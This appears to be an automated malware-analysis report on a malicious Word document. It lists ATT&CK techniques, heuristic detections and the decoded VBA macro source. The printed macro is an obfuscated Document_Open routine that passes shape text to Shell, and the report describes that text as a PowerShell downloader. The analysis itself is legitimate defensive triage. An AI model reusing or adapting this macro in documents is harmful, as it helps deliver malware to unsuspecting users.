MALICIOUS
172
Risk Score
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell
T1566.001 Spearphishing Attachment
The sample contains a Document_Open VBA macro that executes a heavily obfuscated PowerShell command. This command decodes and executes a Base64-encoded string, which appears to be a second-stage payload. The PowerShell command is constructed to download, decompress, and execute further code, likely for malicious purposes.
Heuristics 7
-
ClamAV: Doc.Malware.Digd-6769818-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Digd-6769818-0
-
Reference to PowerShell high SC_STR_POWERSHELLReference to PowerShell
-
LOLBin token sequence in document text high SE_LOLBIN_RUN_COMMANDExtracted document text contains a Windows script/execution tool name (PowerShell, mshta, cmd, rundll32, regsvr32, …) within 220 characters of a dangerous flag, command verb, or URL. This is a visible 'run this' instruction in HTML/PDF/RTF lure bodies, or — in macro-laden Office files — the macro's own string-pool entries appearing adjacent in extracted text.
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Attribute VB_Customizable = True Private Sub Document_open() Dim HBLJMj(1) -
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3397 bytes |
SHA-256: fc3ea6acde3ed70dcfe97fd4853ece2da76d44c6f4a14470bc7661b4f10e797e |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
125 of 176 identifiers look randomly generated (e.g. 'XisBrwENSddViHHIIGCAhJl') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "cUiOqFi" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_open() Dim HBLJMj(1) HBLJMj(0) = InStr(DLXlSMn + ODRlwQZmccijkPWQmqXP + FazvSqhu, dowIlm + GjzTaIzEWtArnlttqAmukM + zRNfATd) + InStrRev(tlzqvOAK + ZqDCPvjsTpMWBncr + NioAHqj, ljkqtvu + jnnlpHhiTtbYTHpLCHFdlG + cQObH) / InStr(IGtcohT + PBLNQdAhfLqiJBiENdsm + LBwjWhji, kvUqzQ + cMndwszhOPVXPITDwMzcMX + jmKFww) - InStrRev(qFhEE + BVOlrVmAXMifikbaOvVJ + WESNXX, XwHzmE + lahjNVfFcEdWtfLUQUmN + VHidiT) Dim RKvbjL(4) RKvbjL(0) = InStrRev(MjvSWq + vBZkfcMhWsNzcAzFikk + TrHDR, idRhctLw + iuMSnjjmKWkvoXQoU + AfNkjuXO) / InStrRev(QWBqA + QXTfWUtlXoWuJTthFCvpMX + TYiUoo, waQdKT + XisBrwENSddViHHIIGCAhJl + XQWlzARd) - InStrRev(iWUQY + HCOTILtunViFZOqjwsd + icvUDo, iWCiJXO + sFMwuVYzFasihzpjZ + FzrDopWQ) + InStrRev(klzXIUj + vFiQmFEBMiiVTOFrff + PwHoSGZ, YzvkW + wkRVEtPRzXscutZT + RlRbjcJ) RKvbjL(1) = InStrRev(RdhAsv + cGErWViNOvFCLDhwzuUjj + jtLPzhjM, OnuQj + NOQVGaZKwOmHwcooUw + ZqOqBn) + InStrRev(QwwSVcX + tpokRZmtoRbubXrfrkQ + NzoIHw, OVaJZ + QZEHwHVXaSVijcCQWUl + vSMMZAO) RKvbjL(2) = InStrRev(kPRfJn + bQipdNjlzGIHtaLfIvw + szAcQ, ONQsVz + hzfnDIOzjXFzKftWwdkk + irurtKw) + InStrRev(wIPITDbk + szVGSFNbsowPPFZXEZbUD + vWZSVsi, kIkbmf + sFBtACmENwTQdRKrCJXvO + VQjukYrH) RKvbjL(3) = InStrRev(IsuUifQf + GHqovcfKUJmVIhJdabJ + noPWXd, iAlOar + jLwIpXmnAZGvzGXA + SHhNt) / InStrRev(WSDOKU + MsdRRcWDAOVEorsvRE + vOCPUzKw, jkOtjp + kdMimQiAXRYZziCONPZt + CYDtJID) Dim ljQbm(1) ljQbm(0) = InStrRev(zniJt + QLjbWSLHwkrfRrMqsMOR + jFcFZXI, cwbcoQ + bSruBGXQwDcaCzqNjf + cnOosnl) / InStrRev(kLmwkhf + hJbFbqEWdwCYsOHmENki + sOQvVRL, zYzWLY + RIZXLqsFZsIIzijcJIBLn + YVtrv) Dim YTVzFj(3) YTVzFj(0) = InStrRev(pAsSqE + wucvEfPzUzSWMdikiJCWC + TBSVMHY, zSSlsDXO + FBcWNoXVjtYZqOiQIr + PfLLhral) * InStrRev(VzkqiFj + CsCZtbSfswdpLHNqqbuwFnE + WkZjUEs, GSjPM + qHfocdnEzLHuzkjJETOJl + Ajita) YTVzFj(1) = InStr(FOfYD + wVfWskGOiwjChZuVWdDVKX + pjGPhdQH, ntizlPE + NafmhihjsAVwwmOORDmZb + BnXso) * InStrRev(diXJzY + uAPzOowvFAqcqaBWduLXEjG + OIipdS, KdiXErp + ammIWFDCEicKOjhZXKN + oqZPzZD) YTVzFj(2) = InStrRev(QIUjFrC + VOaJAPWUJQOdETjfnDi + ruFnj, WsXrvHip + uEtFWmvslKWrjmNGJiUqT + FVjzpq) + InStrRev(JdHGUHKv + fzBoFisMAKaOZLALhwUBzZ + Izwzm, ouVQPzEc + jjPhuUjkXwLwwdjOlB + QlRfQ) Const vzRbVmRn = 630518006 - 630518006 Shell@ Shapes(1).TextFrame.TextRange.Text + TNjOqtX + ZPCsAcw, vzRbVmRn Dim TUUOV(2) TUUOV(0) = InStrRev(Ywwdp + VudzRpDFVkMlQIUNPq + ErNDS, koQqjzX + cdQOwiJoGinIbtlYGDlGI + wwvpUtd) + InStrRev(lafJaij + MocMWEMwYbHjNiNl + pJSrIIw, XXWuvqJj + kIuEOtOSwrVuOaXiOzIkzB + cMtEwn) - InStrRev(duEEzt + fGCcHYLzOLovDKYlG + thwzwdaF, KHFswb + nhEkbnFwAujznNU + Xuluq) + InStr(USCEiLc + mIFnLrZLwLbKRwEksvKu + TmvvLNf, AFOswjQ + rfDKBYaGrZacOVFidzkjKi + PEIEcj) TUUOV(1) = InStr(FbJkX + HnqBYrjEbhijGzkzLhwnz + LQjiU, ZdsUh + VUDdvBrFjhAYJsIKXfdDVGV + dGYus) - InStrRev(NuJBpIQK + UnzhUaWUCsQhXhSzKnIH + OrrUOPS, miZcIO + XNwwMmNazLnNMCGAiBFn + NkrCF) + InStrRev(MPktUhB + HnRHSGCsaCOOVYlzBkK + bawbmMUF, uSWRsG + KiGVztTTwBCfwScjzPjFz + bzDHtssv) + InStrRev(hFcEHSPY + ozAulzwKiZJCCSoCJKjw + aPErwQht, dzIVt + VVSYCalCbWuhEAZjtScN + cuoVHS) End Sub |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.